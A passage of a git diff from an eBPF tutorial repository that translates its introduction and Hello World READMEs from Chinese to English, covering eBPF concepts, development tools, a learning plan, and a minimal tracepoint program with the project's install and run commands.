**深入主题** + 探索 eBPF 在 Android 上的应用、使用 eBPF 进行网络加速以及通过系统调用修改来保护系统。 + +## 如何使用 eBPF 编程 + +从头编写 eBPF 程序可能较为复杂。为简化这一过程,LLVM 于 2015 年引入了将高级语言代码编译为 eBPF 字节码的能力。自那时起,eBPF 社区构建了像 `libbpf` 这样的库来管理这些程序。这些库帮助将 eBPF 字节码加载到内核中并执行基本任务。Linux 内核源代码中 `samples/bpf/` 目录包含了众多 eBPF 示例。 + +典型的 eBPF 程序包含两个部分:内核空间代码(`*_kern.c`)和用户空间代码(`*_user.c`)。内核空间代码定义逻辑,而用户空间代码负责加载和与内核交互。然而,像 `libbpf-bootstrap` 和 Go eBPF 库这样的工具简化了这一过程,允许一次性编译和更容易的开发。 + +### eBPF 开发工具 + +- **BCC**:一个基于 Python 的工具链,简化了 eBPF 程序的编写、编译和加载。它提供了许多预构建的追踪工具,但在依赖和兼容性方面存在一些限制。 +- **eBPF Go 库**:一个 Go 库,解耦了获取 eBPF 字节码的过程与加载和管理 eBPF 程序的过程。 +- **libbpf-bootstrap**:基于 `libbpf` 的现代脚手架,提供了高效的工作流用于编写 eBPF 程序,提供简单的一次性编译过程以生成可重用的字节码。 +- **eunomia-bpf**:一个用于编写仅包含内核空间代码的 eBPF 程序的工具链。它通过动态加载 eBPF 程序简化了 eBPF 程序的开发。 + +这些工具有助于减少开发 eBPF 程序的复杂性,使开发者更容易优化系统性能、安全性和可观测性。 + +## 学习 eBPF 开发的一些技巧 + +本文不会提供更详细的 eBPF 原理介绍,但以下是一个学习计划和参考资料,可能对您有帮助: + +### eBPF 简介(5-7 小时) + +- 使用 Google 或其他搜索引擎搜索:eBPF +- 询问类似 ChatGPT 的工具:什么是 eBPF? + +推荐: + +- 阅读 eBPF 介绍:(30 分钟) +- 简要了解 eBPF 内核相关文档:(了解技术细节的查询来源,30 分钟) + +回答三个问题: + +1. 了解 eBPF 是什么?我们为什么需要它?难道不能使用内核模块吗? +2. 它有哪些功能?它在 Linux 内核中能做什么?eBPF 程序和助手函数有哪些类型(不需要全部了解,但需要知道在哪里查找)? +3. 它能用于哪些场景?例如,可以在哪些情况下使用?网络、安全、可观测性? + +### 理解如何开发 eBPF 程序(10-15 小时) + +了解并尝试 eBPF 开发框架: + +- bpftrace 教程:(尝试,1 小时) +- 使用 BCC 开发各种工具的示例:(运行,3-4 小时) +- libbpf 的一些示例:(运行任何有趣的示例并阅读源代码,2 小时) +- 教程:(阅读第 1-10 部分,3-4 小时) + +其他开发框架:Go 或 Rust 语言,请自行搜索和尝试(0-2 小时) + +如果有问题或想了解的内容,无论是否与本项目相关,都可以在该项目的讨论区开始讨论。 + +回答一些问题并尝试一些实验(2-5 小时): + +1. 如何开发最简单的 eBPF 程序? +2. 如何使用 eBPF 追踪内核功能或函数?有很多方法,提供相应的代码示例; +3. 用户模式和内核模式之间的通信解决方案有哪些?如何将信息从用户模式发送到内核模式?如何将信息从内核模式传递到用户模式?提供代码示例; +4. 编写您自己的 eBPF 程序以实现某个功能; +5. 在 eBPF 程序的整个生命周期中,用户模式和内核模式分别做了什么? + +## 参考资料 + +- eBPF 介绍: +- BPF 编译器集合(BCC): +- eunomia-bpf: + +您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。所有内容均为开源。我们将继续分享更多关于 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 \ No newline at end of file diff --git a/src/0-introduce/README_en.md b/src/0-introduce/README_en.md deleted file mode 100644 index 77ed02e..0000000 --- a/src/0-introduce/README_en.md +++ /dev/null @@ -1,162 +0,0 @@ -# eBPF Tutorial by Example 0: Introduction to Core Concepts and Tools - -This is the first part of a comprehensive development tutorial for eBPF, designed to guide you through practical eBPF development, from beginner to advanced. It covers fundamental concepts, real-world code examples, and applications in modern systems. Rather than focusing on traditional tools like BCC, we will use modern frameworks such as `libbpf`, `Cilium`, `libbpf-rs`, and eunomia-bpf, with examples provided in `C`, `Go`, and `Rust`. - -The primary goal of this tutorial is to provide clear and concise examples of eBPF tools (starting with as little as 20 lines of code!) to help developers quickly grasp essential eBPF development techniques. Each example is self-contained and can be found in the directory structure, with every directory representing an independent eBPF tool. You can also visit our tutorial code repository or website for more examples and complete tutorial source code. - -## Introduction to eBPF: Secure and Efficient Kernel Extension - -eBPF (extended Berkeley Packet Filter) is a groundbreaking technology that allows developers to run small programs directly in kernel space, safely and efficiently. Unlike traditional approaches that required modifying kernel source code or loading new modules, eBPF made it possible to customize and optimize network behavior dynamically, all without disrupting system operations. 
This flexibility and efficiency made eBPF a pivotal technology for overcoming the limitations of traditional networking stacks. - -### What Makes eBPF So Powerful? - -- **Direct Kernel Interaction:** eBPF programs execute within the kernel, interacting with system-level events such as network packets, system calls, or tracepoints. -- **Safe Execution:** eBPF ensures safety through a verifier that checks the logic of the program before it runs, preventing potential kernel crashes or security breaches. -- **Minimal Overhead:** eBPF achieves near-native execution speed by employing a Just-In-Time (JIT) compiler, which translates eBPF bytecode into optimized machine code for the specific architecture. - -## eBPF: Past, Present, and Future - -### Past: Programmable Networking Transformed - -When eBPF was introduced in 2014, it revolutionized how developers approached networking by allowing small, programmable kernel-space applications to handle packet processing in real time. By hooking into key kernel points, eBPF enabled custom logic to be applied whenever a network packet arrived, leading to higher efficiency and flexibility. This allowed organizations to tailor networking behavior without the overhead of custom drivers or kernel modifications, creating an ideal solution for cloud-native and data-center environments. -### Present: A Versatile Framework for Modern Computing Needs - -eBPF has evolved into a versatile framework that extends beyond its original purpose of networking, now encompassing observability, tracing, security, and even system resource management. eBPF programs can dynamically hook into kernel events, giving developers precise control over system behavior and performance optimization without requiring kernel modifications or reboots. This makes eBPF an essential tool for system administrators and developers who aim to monitor, optimize, and secure their environments. - -Here are some key areas where eBPF is widely used today: - -- **Networking:** eBPF offers real-time, high-speed packet filtering and processing within the kernel, allowing for the creation of custom protocol parsers and network policies without needing new drivers or system restarts. This enables highly efficient network management in cloud and data center environments. - -- **Observability:** eBPF enables developers to gather detailed insights into system behavior by collecting custom metrics and performing in-kernel data aggregation. By tapping into kernel tracepoints and function calls, eBPF helps identify performance issues and track down elusive bugs. - -- **Tracing & Profiling:** eBPF provides powerful tracing and profiling capabilities by attaching to kernel functions, tracepoints, and even user-space probes. This allows developers to gain deep insights into system and application behavior, enabling them to optimize performance and resolve complex system issues. - -- **Security:** eBPF plays a vital role in real-time security monitoring. It enables deep inspection of system calls, network traffic, and other kernel activities, helping to enforce dynamic security policies and detect anomalous behavior, providing an efficient way to safeguard infrastructure. - -- **Scheduler Optimization:** eBPF is increasingly used to enhance CPU scheduling, offering the ability to monitor CPU load and optimize how tasks are distributed across cores. This can lead to more efficient use of CPU resources and improved system responsiveness. 
- -- **HID (Human Interface Device) Driver Enhancements:** Developers use eBPF to optimize HID drivers for devices like keyboards, mice, and touchscreens. By adding custom logic for handling input events, eBPF improves responsiveness in latency-sensitive applications. - -Organizations across industries have adopted eBPF at scale: - -- **Google:** Uses eBPF for security auditing, packet processing, real-time performance monitoring, and optimizing CPU scheduling across its vast infrastructure. -- **Netflix:** Leverages eBPF for network traffic analysis, ensuring high availability and performance for streaming services. -- **Android:** Applies eBPF to optimize network usage, power consumption, and resource allocation, improving performance and battery life on millions of devices. -- **S&P Global:** Utilizes eBPF through **Cilium** for managing networking across multiple clouds and on-premises systems, ensuring scalability and security. -- **Shopify:** Implements eBPF with **Falco** for intrusion detection, bolstering security on its e-commerce platform. -- **Cloudflare:** Uses eBPF for network observability, security monitoring, and performance optimization, protecting millions of websites globally. - -eBPF's ability to dynamically adjust system behavior and extend into user space makes it an essential technology for modern computing. Whether it's optimizing network traffic, improving security, or enhancing system performance, eBPF enables developers to address real-time requirements efficiently and safely. - -In addition to its kernel-mode runtime, eBPF can also be extended to user space. For example, [bpftime](https://github.com/eunomia-bpf/bpftime), a user-space eBPF runtime, allows for higher-performance tracing, performance analysis, and plugin support in user-space applications. This extension of eBPF into user space helps improve flexibility and performance in various use cases that go beyond kernel-level tasks. - -### Future: The Expanding Potential of eBPF - -Looking forward, eBPF is expected to become an even more integral part of operating systems. The focus is on improving its flexibility, modularity, and ease of use, making it accessible for an even broader range of applications. Innovations in memory management, concurrency mechanisms, and better integration with user-space applications are on the horizon. Projects are already underway to compile significant parts of the Linux kernel to the BPF instruction set, potentially revolutionizing how kernel development and analysis are performed. - -Advancements such as dynamic stacks, better observability tools for user space (e.g., Fast Uprobes and language-specific stack walkers), and safer program termination mechanisms will continue to strengthen eBPF’s reliability and expand its use cases. Additionally, new tools and libraries will simplify eBPF development, lowering the barrier to entry for both kernel and application developers. - -## Getting Started with the Tutorial - -This tutorial provides practical eBPF development practices, covering topics from beginner to advanced levels. We focus on hands-on examples in areas like observability, networking, and security, using frameworks like `libbpf`, `libbpf-rs`, and `eunomia-bpf`, with examples in C, Go, and Rust. - -### Who Is This Tutorial For? - -- **Developers** looking to implement custom kernel solutions. -- **System Administrators** aiming to enhance performance and security. -- **Tech Enthusiasts** exploring cutting-edge kernel technologies. - -### What Will You Learn? 
- -- **Core Concepts:** eBPF fundamentals and integration with the Linux kernel. -- **Practical Skills:** Writing and deploying eBPF programs. -- **Advanced Topics:** Exploring security, tracing, and future innovations in eBPF. - ---- - -## Table of Contents - -1. **Introduction to eBPF** - Basic concepts and the tools you need to get started. - -2. **Beginner Examples** - Simple programs such as "Hello World" and basic tracing using kprobe and uprobe. - -3. **Observability** - Examples focused on monitoring network traffic, file operations, and process behavior using eBPF. - -4. **Networking** - Examples focused on modifying and optimizing network traffic, such as XDP, TC, and socket. - -5. **Security** - Programs for hiding process and files, sending signals to kill process, and tracking process events for security. - -6. **Advanced Use Cases** - Complex examples involving performance profiling, scheduler optimization, and eBPF in user space (e.g., bpftime). - -7. **In-Depth Topics** - Exploring eBPF for Android, using eBPF for network acceleration, and securing systems through syscall modifications. - -## How to Use eBPF Programming - -Writing eBPF programs from scratch can be complex. To simplify this, LLVM introduced the ability to compile high-level language code into eBPF bytecode in 2015. The eBPF community has since built libraries like `libbpf` to manage these programs. These libraries help load eBPF bytecode into the kernel and perform essential tasks. The Linux kernel source contains numerous eBPF examples in the `samples/bpf/` directory. - -A typical eBPF program involves two parts: kernel space code (`*_kern.c`) and user space code (`*_user.c`). The kernel space code defines the logic, while the user space code manages loading and interacting with the kernel. However, tools like `libbpf-bootstrap` and the Go eBPF library help simplify this process, allowing for one-time compilation and easier development. - -### Tools for eBPF Development - -- **BCC**: A Python-based toolchain that simplifies writing, compiling, and loading eBPF programs. It offers many pre-built tracing tools but has limitations with dependencies and compatibility. -- **eBPF Go Library**: A Go library that decouples the process of obtaining eBPF bytecode from the loading and management of eBPF programs. -- **libbpf-bootstrap**: A modern scaffold based on `libbpf` that provides an efficient workflow for writing eBPF programs, offering a simple one-time compilation process for reusable bytecode. -- **eunomia-bpf**: A toolchain for writing eBPF programs with only kernel space code. It simplifies the development of eBPF programs by dynamically loading them. - -These tools help reduce the complexity of developing eBPF programs, making the process more accessible to developers aiming to optimize system performance, security, and observability. - -## Some Tips on Learning eBPF Development - -This article will not provide a more detailed introduction to the principles of eBPF, but here is a learning plan and reference materials that may be of value: - -### Introduction to eBPF (5-7h) - -- Google or other search engines: eBPF -- Ask ChatGPT-like things: What is eBPF? - -Recommended: - -- Read the introduction to ebpf: (30min) -- Briefly understand the ebpf kernel-related documentation: (Know where to queries for tech details, 30min) - -Answer three questions: - -1. Understand what eBPF is? Why do we need it? Can't we use kernel modules? -2. What functions does it have? What can it do in the Linux kernel? 
What are the types of eBPF programs and helpers (not all of them need to be known, but need to know where to find them)? -3. What can it be used for? For example, in which scenarios can it be used? Networking, security, observability? - -### Understand how to develop eBPF programs (10-15h) - -Understand and try eBPF development frameworks: - -- bpftrace tutorial: (Try it,1h) -- Examples of developing various tools with BCC: (Run through, 3-4h) -- Some examples of libbpf: (Run any interesting one and read the source code, 2h) -- Tutorials: (Read part 1-10, 3-4h) - -Other development frameworks: Go or Rust language, please search and try on your own (0-2h) - -Have questions or things you want to know, whether or not they are related to this project, you can start discussing in the discussions of this project. - -Answer some questions and try some experiments (2-5h): - -1. How to develop the simplest eBPF program? -2. How to trace a kernel feature or function with eBPF? There are many ways, provide corresponding code examples; -3. What are the solutions for communication between user mode and kernel mode? How to send information from user mode to kernel mode? How to pass information from kernel mode to user mode? Provide code examples; -4. Write your own eBPF program to implement a feature; -5. In the entire lifecycle of an eBPF program, what does it do in user mode and kernel mode? - -## References - -- eBPF Introduction: -- BPF Compiler Collection (BCC): -- eunomia-bpf: - -You can also visit our tutorial code repository or website for more examples and complete tutorial source code. All content is open source. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology.". diff --git a/src/1-helloworld/README.md b/src/1-helloworld/README.md index 0d5e018..a94181a 100644 --- a/src/1-helloworld/README.md +++ b/src/1-helloworld/README.md @@ -1,47 +1,47 @@ -# eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 +# eBPF Tutorial by Example 1: Hello World, Framework and Development -在本篇博客中,我们将深入探讨eBPF(Extended Berkeley Packet Filter)的基本框架和开发流程。eBPF是一种在Linux内核上运行的强大网络和性能分析工具,它为开发者提供了在内核运行时动态加载、更新和运行用户定义代码的能力。这使得开发者可以实现高效、安全的内核级别的网络监控、性能分析和故障排查等功能。 +In this blog post, we will delve into the basic framework and development process of eBPF (Extended Berkeley Packet Filter). eBPF is a powerful network and performance analysis tool that runs on the Linux kernel, providing developers with the ability to dynamically load, update, and run user-defined code at kernel runtime. This enables developers to implement efficient, secure kernel-level network monitoring, performance analysis, and troubleshooting functionalities. -本文是eBPF入门开发实践教程的第二篇,我们将重点关注如何编写一个简单的eBPF程序,并通过实际例子演示整个开发流程。在阅读本教程之前,建议您先学习第一篇教程,以便对eBPF的基本概念有个大致的了解。 +This article is the second part of the eBPF Tutorial by Example, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial. -在开发eBPF程序时,有多种开发框架可供选择,如 BCC(BPF Compiler Collection)libbpf、cilium/ebpf、eunomia-bpf 等。虽然不同工具的特点各异,但它们的基本开发流程大致相同。在接下来的内容中,我们将深入了解这些流程,并以 Hello World 程序为例,带领读者逐步掌握eBPF开发的基本技巧。 +When developing eBPF programs, there are multiple development frameworks to choose from, such as BCC (BPF Compiler Collection) libbpf, cilium/ebpf, eunomia-bpf, etc. 
Although these tools have different characteristics, their basic development process is similar. In the following content, we will delve into these processes and use the Hello World program as an example to guide readers in mastering the basic skills of eBPF development.

-本教程将帮助您了解eBPF程序的基本结构、编译和加载过程、用户空间与内核空间的交互方式以及调试与优化技巧。通过学习本教程,您将掌握eBPF开发的基本知识,并为后续进一步学习和实践奠定坚实的基础。
+This tutorial will help you understand the basic structure of eBPF programs, the compilation and loading process, the interaction between user space and kernel space, as well as debugging and optimization techniques. By studying this tutorial, you will master the basic knowledge of eBPF development and lay a solid foundation for further learning and practice.

-## eBPF开发环境准备与基本开发流程
+## Preparation of the eBPF Development Environment and Basic Development Process

-在开始编写eBPF程序之前,我们需要准备一个合适的开发环境,并了解eBPF程序的基本开发流程。本部分将详细介绍这些内容。
+Before starting to write eBPF programs, we need to prepare a suitable development environment and understand the basic development process of eBPF programs. This section covers both in detail.

-### 安装必要的软件和工具
+### Installing the necessary software and tools

-要开发eBPF程序,您需要安装以下软件和工具:
+To develop eBPF programs, you need to install the following software and tools:

-- Linux 内核:由于eBPF是内核技术,因此您需要具备较新版本的Linux内核(至少 4.8 及以上版本,建议至少在 5.15 以上),以支持eBPF功能。
- - 建议使用最新的 Ubuntu 版本(例如 Ubuntu 23.10)以获得最佳的学习体验,较旧的内核 eBPF 功能支持可能相对不全。
-- LLVM 和 Clang:这些工具用于编译eBPF程序。安装最新版本的LLVM和Clang可以确保您获得最佳的eBPF支持。
+- Linux kernel: Since eBPF is a kernel technology, you need a relatively new Linux kernel (at least version 4.8; 5.15+ or 6.2+ is recommended) to support eBPF functionality.
+  - If possible, installing a recent Ubuntu release (e.g., 23.10) is recommended; older kernels may have comparatively incomplete eBPF support.
+- LLVM and Clang: These tools are used to compile eBPF programs. Installing the latest version of LLVM and Clang ensures that you get the best eBPF support.

-eBPF 程序主要由两部分构成:内核态部分和用户态部分。内核态部分包含 eBPF 程序的实际逻辑,用户态部分负责加载、运行和监控内核态程序。
+An eBPF program consists of two main parts: the kernel space part and the user space part. The kernel space part contains the actual logic of the eBPF program, while the user space part is responsible for loading, running, and monitoring the kernel space program.

-当您选择了合适的开发框架后,如BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以BCC工具为例,我们将介绍eBPF程序的基本开发流程:
+Once you have chosen a suitable development framework, such as BCC (BPF Compiler Collection), libbpf, cilium/ebpf, or eunomia-bpf, you can begin developing the user space and kernel space programs. Taking the BCC tool as an example, we will introduce the basic development process of eBPF programs:

-1. 安装BCC工具:根据您的Linux发行版,按照BCC官方文档的指南安装BCC工具和相关依赖。
-2. 编写eBPF程序(C语言):使用C语言编写一个简单的eBPF程序,例如Hello World程序。该程序可以在内核空间执行并完成特定任务,如统计网络数据包数量。
-3. 编写用户态程序(Python或C等):使用Python、C等语言编写用户态程序,用于加载、运行eBPF程序以及与之交互。在这个程序中,您需要使用BCC提供的API来加载和操作内核态的eBPF程序。
-4. 编译eBPF程序:使用BCC工具,将C语言编写的eBPF程序编译成内核可以执行的字节码。BCC会在运行时动态从源码编译eBPF程序。
-5. 加载并运行eBPF程序:在用户态程序中,使用BCC提供的API加载编译好的eBPF程序到内核空间,然后运行该程序。
-6. 与eBPF程序交互:用户态程序通过BCC提供的API与eBPF程序交互,实现数据收集、分析和展示等功能。例如,您可以使用BCC API读取eBPF程序中的map数据,以获取网络数据包统计信息。
-7. 卸载eBPF程序:当不再需要eBPF程序时,用户态程序应使用BCC API将其从内核空间卸载。
-8. 调试与优化:使用 bpftool 等工具进行eBPF程序的调试和优化,提高程序性能和稳定性。
+1. Installing the BCC tool: Depending on your Linux distribution, follow the guidelines in the BCC documentation to install the BCC tool and its dependencies.
+2.
Writing an eBPF program (C language): Use the C language to write a simple eBPF program, such as the Hello World program. This program can be executed in kernel space and perform specific tasks, such as counting network packets. +3. Writing a user space program (Python or C, etc.): Use languages like Python or C to write a user space program that is responsible for loading, running, and interacting with the eBPF program. In this program, you need to use the API provided by BCC to load and manipulate the kernel space eBPF program. +4. Compiling the eBPF program: Use the BCC tool to compile the eBPF program written in C language into bytecode that can be executed by the kernel. BCC dynamically compiles the eBPF program from source code at runtime. +5. Loading and running the eBPF program: In the user space program, use the API provided by BCC to load the compiled eBPF program into kernel space and then run it. +6. Interacting with the eBPF program: The user space program interacts with the eBPF program through the API provided by BCC, implementing data collection, analysis, and display functions. For example, you can use the BCC API to read map data in the eBPF program to obtain network packet statistics. +7. Unloading the eBPF program: When the eBPF program is no longer needed, the user space program should unload it from the kernel space using the BCC API. +8. Debugging and optimization: Use tools like bpftool to debug and optimize eBPF programs, improving program performance and stability. -通过以上流程,您可以使用BCC工具开发、编译、运行和调试eBPF程序。请注意,其他框架(如libbpf、cilium/ebpf和eunomia-bpf)的开发流程大致相似但略有不同,因此在选择框架时,请参考相应的官方文档和示例。 +Through the above process, you can develop, compile, run, and debug eBPF programs using the BCC tool. Note that the development process of other frameworks, such as libbpf, cilium/ebpf, and eunomia-bpf, is similar but slightly different. Therefore, when choosing a framework, please refer to the respective official documentation and examples. -通过这个过程,你可以开发出一个能够在内核中运行的 eBPF 程序。eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。它基于 libbpf 的 CO-RE 轻量级开发框架,支持通过用户态 WASM 虚拟机控制 eBPF 程序的加载和执行,并将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块进行分发。我们会使用 eunomia-bpf 进行演示。 +By following this process, you can develop an eBPF program that runs in the kernel. eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain. It aims to simplify the development, building, distribution, and running of eBPF programs. It is based on the libbpf CO-RE lightweight development framework, supports loading and executing eBPF programs through a user space WebAssembly (WASM) virtual machine, and packages precompiled eBPF programs into universal JSON or WASM modules for distribution. We will use eunomia-bpf for demonstration purposes. -## 下载安装 eunomia-bpf 开发工具 +## Download and Install eunomia-bpf Development Tools -可以通过以下步骤下载和安装 eunomia-bpf: +You can download and install eunomia-bpf using the following steps: -下载 ecli 工具,用于运行 eBPF 程序: +Download the ecli tool for running eBPF programs: ```console $ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli @@ -49,21 +49,22 @@ $ ./ecli -h Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args ``` -下载编译器工具链,用于将 eBPF 内核代码编译为 config 文件或 WASM 模块: +Download the compiler toolchain for compiling eBPF kernel code into config files or WASM modules: ```console $ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc $ ./ecc -h eunomia-bpf compiler Usage: ecc [OPTIONS] [EXPORT_EVENT_HEADER] +.... 
```

-注:假如在 aarch64 平台上,请从 release 下载 [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) 和 [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64).
+Note: If you are on the aarch64 platform, please download [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) and [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64) from the releases instead.

-也可以使用 docker 镜像进行编译:
+You can also compile using the docker image:

```console
-$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # 使用 docker 进行编译。`pwd` 应该包含 *.bpf.c 文件和 *.h 文件。
+$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # Compile using docker. `pwd` should contain *.bpf.c files and *.h files.
export PATH=$PATH:~/.eunomia/bin
Compiling bpf object...
Packing ebpf object and config into /src/package.json...
```

@@ -71,7 +72,7 @@ Packing ebpf object and config into /src/package.json...

## Hello World - minimal eBPF program

-我们会先从一个简单的 eBPF 程序开始,它会在内核中打印一条消息。我们会使用 eunomia-bpf 的编译器工具链将其编译为 bpf 字节码文件,然后使用 ecli 工具加载并运行该程序。作为示例,我们可以暂时省略用户态程序的部分。
+We will start with a simple eBPF program that prints a message in the kernel. We will use the eunomia-bpf compiler toolchain to compile it into a BPF bytecode file, and then load and run the program using the ecli tool. For the sake of the example, we can temporarily disregard the user space program.

```c
/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
#define BPF_NO_GLOBAL_DATA
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

typedef unsigned int u32;
typedef int pid_t;
const pid_t pid_filter = 0;

char LICENSE[] SEC("license") = "Dual BSD/GPL";

SEC("tp/syscalls/sys_enter_write")
int handle_tp(void *ctx)
{
    pid_t pid = bpf_get_current_pid_tgid() >> 32;
    if (pid_filter && pid != pid_filter)
        return 0;
    bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid);
    return 0;
}
```

-这段程序通过定义一个 handle_tp 函数并使用 SEC 宏把它附加到 sys_enter_write tracepoint(即在进入 write 系统调用时执行)。该函数通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 write 系统调用的进程 ID,并在内核日志中打印出来。
+This program defines a handle_tp function and attaches it to the sys_enter_write tracepoint using the SEC macro (i.e., it is executed when the write system call is entered). The function retrieves the process ID of the write system call invocation using the bpf_get_current_pid_tgid and bpf_printk functions, and prints it in the kernel log.

-- `bpf_printk()`: 一种将信息输出到trace_pipe(/sys/kernel/debug/tracing/trace_pipe)简单机制。 在一些简单用例中这样使用没有问题, but它也有一些限制:最多3 参数; 第一个参数必须是%s(即字符串);同时trace_pipe在内核中全局共享,其他并行使用trace_pipe的程序有可能会将 trace_pipe 的输出扰乱。 一个更好的方式是通过 BPF_PERF_OUTPUT(), 稍后将会讲到。
-- `void *ctx`:ctx本来是具体类型的参数, 但是由于我们这里没有使用这个参数,因此就将其写成void *类型。
-- `return 0`;:必须这样,返回0 (如果要知道why, 参考 #139 )。
+- `bpf_printk()`: A simple mechanism (a wrapper around the `bpf_trace_printk()` helper) to output information to the trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is fine for simple use cases, but it has limitations: a maximum of 3 parameters; the first parameter must be %s (i.e., a string); and the trace_pipe is globally shared in the kernel, so other programs using the trace_pipe concurrently might disrupt its output. A better approach is to use BPF_PERF_OUTPUT(), which will be discussed later.
+- `void *ctx`: ctx is originally a parameter of a specific type, but since it is not used here, it is written as void *.
+- `return 0;`: This is necessary, returning 0 (to know why, refer to #139 ).

-要编译和运行这段程序,可以使用 ecc 工具和 ecli 命令。首先在 Ubuntu/Debian 上,执行以下命令:
+To compile and run this program, you can use the ecc tool and ecli command. First, on Ubuntu/Debian, execute the following command:

```shell
sudo apt install clang llvm
```

-使用 ecc 编译程序:
+Compile the program using ecc:

```console
$ ./ecc minimal.bpf.c
Compiling bpf object...
Packing ebpf object and config into package.json...
```

-或使用 docker 镜像进行编译:
+Or compile using a docker image:

```shell
docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
```

-然后使用 ecli 运行编译后的程序:
+Then run the compiled program using ecli:

```console
$ sudo ./ecli run package.json
Running eBPF program...
```

-运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:
+After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file:

```console
$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write"
@@ -138,60 +139,57 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_
 <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: BPF triggered sys_enter_write from PID 3840345.
```

-按 Ctrl+C 停止 ecli 进程之后,可以看到对应的输出也停止。
+Once you stop the ecli process by pressing Ctrl+C, the corresponding output will also stop.

-注意:如果正在使用的 Linux 发行版(例如 Ubuntu )默认情况下没有启用跟踪子系统可能看不到任何输出,使用以下指令打开这个功能:
+Note: If your Linux distribution (e.g. Ubuntu) does not have the tracing subsystem enabled by default, you may not see any output. Use the following command to enable this feature:

```console
$ sudo su
# echo 1 > /sys/kernel/debug/tracing/tracing_on
```

-## eBPF 程序的基本框架
+## Basic Framework of an eBPF Program

-如上所述, eBPF 程序的基本框架包括:
+As mentioned above, the basic framework of an eBPF program includes:

-- 包含头文件:需要包含 等头文件。
-- 定义许可证:需要定义许可证,通常使用 "Dual BSD/GPL"。
-- 定义 BPF 函数:需要定义一个 BPF 函数,例如其名称为 handle_tp,其参数为 void *ctx,返回值为 int。通常用 C 语言编写。
-- 使用 BPF 助手函数:在例如 BPF 函数中,可以使用 BPF 助手函数 bpf_get_current_pid_tgid() 和 bpf_printk()。
-- 返回值
+- Including header files: You need to include headers such as `<linux/bpf.h>` and `<bpf/bpf_helpers.h>`, among others.
+- Defining a license: You need to define a license, typically using "Dual BSD/GPL".
+- Defining a BPF function: You need to define a BPF function, for example, named handle_tp, which takes void *ctx as a parameter and returns int. This is usually written in the C language.
+- Using BPF helper functions: In the BPF function, you can use BPF helper functions such as bpf_get_current_pid_tgid() and bpf_printk().
+- Return value

-## tracepoints
+## Tracepoints

-跟踪点(tracepoints)是内核静态插桩技术,在技术上只是放置在内核源代码中的跟踪函数,实际上就是在源码中插入的一些带有控制条件的探测点,这些探测点允许事后再添加处理函数。比如在内核中,最常见的静态跟踪方法就是 printk,即输出日志。又比如:在系统调用、调度程序事件、文件系统操作和磁盘 I/O 的开始和结束时都有跟踪点。跟踪点于 2009 年在 Linux 2.6.32 版本中首次提供。跟踪点是一种稳定的 API,数量有限。
+Tracepoints are a kernel static instrumentation technique, technically just trace functions placed in the kernel source code, which are essentially probe points with control conditions inserted into the source code, allowing post-processing with additional processing functions. The most common static tracing method in the kernel is printk, which outputs log messages. Tracepoints exist, for instance, at the start and end of system calls, scheduler events, file system operations, and disk I/O. Tracepoints were first introduced in Linux version 2.6.32 in 2009. Tracepoints are a stable API and their number is limited.

-## GitHub 模板:轻松构建 eBPF 项目和开发环境
+## GitHub Templates: Build eBPF Projects and Development Environments Easily

-面对创建一个 eBPF 项目,您是否对如何开始搭建环境以及选择编程语言感到困惑?别担心,我们为您准备了一系列 GitHub 模板,以便您快速启动一个全新的eBPF项目。只需在GitHub上点击 `Use this template` 按钮,即可开始使用。
+When faced with creating an eBPF project, are you confused about how to set up the environment and choose a programming language? Don't worry, we have prepared a series of GitHub templates to help you quickly start a brand new eBPF project.
Just click the `Use this template` button on GitHub to get started.

-- :基于C语言和 libbpf 框架的eBPF项目模板
-- :基于Go语言和cilium/ebpf框架的eBPF项目模板
-- :基于Rust语言和libbpf-rs框架的eBPF项目模板
-- :基于C语言和eunomia-bpf框架的eBPF项目模板
+- : eBPF project template based on the C language and libbpf framework.
+- : eBPF project template based on the Go language and cilium/ebpf framework.
+- : eBPF project template based on the Rust language and libbpf-rs framework.
+- : eBPF project template based on the C language and eunomia-bpf framework.

-这些启动模板包含以下功能:
+These starter templates include the following features:

-- 一个 Makefile,让您可以一键构建项目
-- 一个 Dockerfile,用于为您的 eBPF 项目自动创建一个容器化环境并发布到 Github Packages
-- GitHub Actions,用于自动化构建、测试和发布流程
-- eBPF 开发所需的所有依赖项
+- A Makefile for building the project with one command.
+- A Dockerfile for automatically creating a containerized environment for your eBPF project and publishing it to GitHub Packages.
